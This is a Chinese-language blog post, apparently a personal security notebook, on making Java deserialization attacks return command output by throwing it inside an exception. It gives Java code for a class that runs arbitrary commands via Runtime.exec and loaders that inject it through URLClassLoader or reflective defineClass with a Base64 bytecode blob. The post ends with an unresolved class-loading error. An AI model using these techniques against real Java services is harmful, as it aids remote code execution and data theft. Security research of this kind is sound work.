Java报错产生回显

Posted by Azeril on July 1, 2024

1、描述

比如打Java链子的时候,碰到无回显的情况,就只能打内存马,但是内存马也需要找上下文或者线程来获取,request和response对象,及其麻烦,有没有一种更通用的方式呢? 日常逛先知,发现了一篇2018年不错的文章 defineClass在java反序列化当中的利用 - 先知社区 (aliyun.com)

2、前置知识

正常情况下,java会先调用classLoader去加载.class文件,然后调用loadClass函数去加载对应的类名,返回一个Class对象。 而defineClass可以从byte[]还原出一个Class对象,

3、实践


import java.io.BufferedInputStream;
public class R {
    public void exec(String cmd)throws Exception{
        String s="";
        int len;
        int bufSize=4096;
        byte[] buffer=new byte[bufSize];
        BufferedInputStream bis=new BufferedInputStream(Runtime.getRuntime().exec(cmd).getInputStream(),bufSize);
        while((len=bis.read(buffer,0,bufSize))!=-1)
            s+=new String(buffer,0, len);
        bis.close();
        throw new Exception("^^^"+s+"^^^");
    }
}
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.net.MalformedURLException;
import java.net.URL;
import java.net.URLClassLoader;

public class cxk {
    public static void main(String[] args) throws MalformedURLException, NoSuchMethodException, InstantiationException, IllegalAccessException, ClassNotFoundException, InvocationTargetException {
        URLClassLoader cls=new URLClassLoader(new URL[]{new URL("file:K:\\ADLAB\\commons\\CommonsCollections\\src\\main\\java\\R.java")});
        Class cl=cls.loadClass("R");
        Method m=cl.getMethod("exec",String.class);
        m.invoke(cl.newInstance(),"ipconfig");
    }
}

image-20240701160511717

加载.Class 、.Java、.jar文件都是可以的 image-20240701160705062

​ 但是前提是要先写入一个.class或是.jar文件(写入方法这里不描述,使用FileOutputStream类,方法大同小异),这样显得拖泥带水,而且让利用过程变得很复杂。

这个是可以的

import org.mozilla.javascript.DefiningClassLoader;

import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.net.MalformedURLException;
import java.net.URL;
import java.net.URLClassLoader;
import java.security.ProtectionDomain;
import java.util.Base64;

public class cxk {
    public static void main(String[] args) throws MalformedURLException, NoSuchMethodException, InstantiationException, IllegalAccessException, ClassNotFoundException, InvocationTargetException {
        Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);        // 注意 getDeclaredMethod 只能获取当前类的所有方法, 而 defineClass 其实是在 AppClassLoader 的父类 java.lang.ClassLoader 里面, 所以需要通过 ClassLoader.class 来获取 Class 对象
        defineClass.setAccessible(true);
        byte[] code = Base64.getDecoder().decode("yv66vgAAADQAVQoAFAAwCAAxBwAyCgAzADQKADMANQoANgA3CgADADgKAAMAOQcAOgoACQAwCgAJADsHADwKAAwAPQoACQA+CgADAD8HAEAIAEEKABAAQgcAQwcARAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQADTFI7AQAEZXhlYwEAFShMamF2YS9sYW5nL1N0cmluZzspVgEAA2NtZAEAEkxqYXZhL2xhbmcvU3RyaW5nOwEAAXMBAANsZW4BAAFJAQAHYnVmU2l6ZQEABmJ1ZmZlcgEAAltCAQADYmlzAQAdTGphdmEvaW8vQnVmZmVyZWRJbnB1dFN0cmVhbTsBAA1TdGFja01hcFRhYmxlBwBDBwA8BwAlBwAyAQAKRXhjZXB0aW9ucwEAClNvdXJjZUZpbGUBAAZSLmphdmEMABUAFgEAAAEAG2phdmEvaW8vQnVmZmVyZWRJbnB1dFN0cmVhbQcARQwARgBHDAAcAEgHAEkMAEoASwwAFQBMDABNAE4BABdqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcgwATwBQAQAQamF2YS9sYW5nL1N0cmluZwwAFQBRDABSAFMMAFQAFgEAE2phdmEvbGFuZy9FeGNlcHRpb24BAANeXl4MABUAHQEAAVIBABBqYXZhL2xhbmcvT2JqZWN0AQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7AQARamF2YS9sYW5nL1Byb2Nlc3MBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAZKExqYXZhL2lvL0lucHV0U3RyZWFtO0kpVgEABHJlYWQBAAcoW0JJSSlJAQAGYXBwZW5kAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7AQAHKFtCSUkpVgEACHRvU3RyaW5nAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAVjbG9zZQAhABMAFAAAAAAAAgABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAQAGQAAAAwAAQAAAAUAGgAbAAAAAQAcAB0AAgAXAAABMgAGAAcAAAB4EgJNERAANgQVBLwIOgW7AANZuAAEK7YABbYABhUEtwAHOgYZBhkFAxUEtgAIWT4CnwAjuwAJWbcACiy2AAu7AAxZGQUDHbcADbYAC7YADk2n/9MZBrYAD7sAEFm7AAlZtwAKEhG2AAsstgALEhG2AAu2AA63ABK/AAAAAwAYAAAAIgAIAAAABgADAAgACAAJAA4ACgAjAAsAMwAMAFMADQBYAA4AGQAAAEgABwAAAHgAGgAbAAAAAAB4AB4AHwABAAMAdQAgAB8AAgAvAEkAIQAiAAMACABwACMAIgAEAA4AagAkACUABQAjAFUAJgAnAAYAKAAAADIAAv8AIwAHBwApBwAqBwAqAAEHACsHACwAAP8ALwAHBwApBwAqBwAqAQEHACsHACwAAAAtAAAABAABABAAAQAuAAAAAgAv");
        Class R = (Class)defineClass.invoke(ClassLoader.getSystemClassLoader(), "R", code, 0, code.length);
        Method exec = R.getMethod("exec", String.class);
        exec.invoke(R.newInstance(),"ipconfig");
    }
}

但是如果把上面的换成bytecode字节码那个,就会提醒 表明可能存在多个类加载器尝试同时加载同一个类,导致了重复的类定义。

出现的问题

image-20240702111437173

就是在defineClassMethod反射的时候,导致了加载器加载的错误 image-20240702111737481

呃呃呃搞不定

image-20240702114443883


Creative Commons License
本作品采用CC BY-NC-ND 4.0进行许可。转载,请注明原作者 Azeril 及本文源链接。